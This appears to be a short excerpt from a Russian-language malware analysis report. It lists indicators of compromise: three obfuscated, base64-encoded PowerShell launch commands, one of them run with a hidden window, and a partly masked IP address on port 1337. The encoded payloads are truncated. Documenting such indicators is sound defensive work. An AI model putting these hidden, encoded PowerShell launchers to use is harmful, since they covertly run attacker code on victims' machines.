Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C poweRsheLl ([char]45+[char]101+[char]110+[char]99) SQBGACgAJABQAFMAVgBlAFIAcwBJAE8ATgBUAGEAYgBMAGUALgBQAFMAVgBFAFIAcwBpAG8AbgAuAE0AYQBKAG8AcgAgAC0ARwBlACAAMwApAHsAJAA5ADMAOQA9AFsAUgBlA...
- '52.##.137.255':1337
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -W 1 -C poweRsheLl ([char]45+[char]101+[char]110+[char]99) SQBGACgAJABQAFMAVgBlAFIAcwBJAE8ATgBUAGEAYgBMAGUALgBQAFMAVgBFAFIAcwBpAG8AbgAuAE0AYQBKAG8AcgAgAC0ARwBlACAAMwApAHsAJAA5ADMAOQA9AFsAUgBlA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc SQBGACgAJABQAFMAVgBlAFIAcwBJAE8ATgBUAGEAYgBMAGUALgBQAFMAVgBFAFIAcwBpAG8AbgAuAE0AYQBKAG8AcgAgAC0ARwBlACAAMwApAHsAJAA5ADMAOQA9AFsAUgBlAEYAXQAuAEEAcwBzAEUAbQBiAGwAWQAuAEcARQB0AFQAWQBQAEUAKAAn...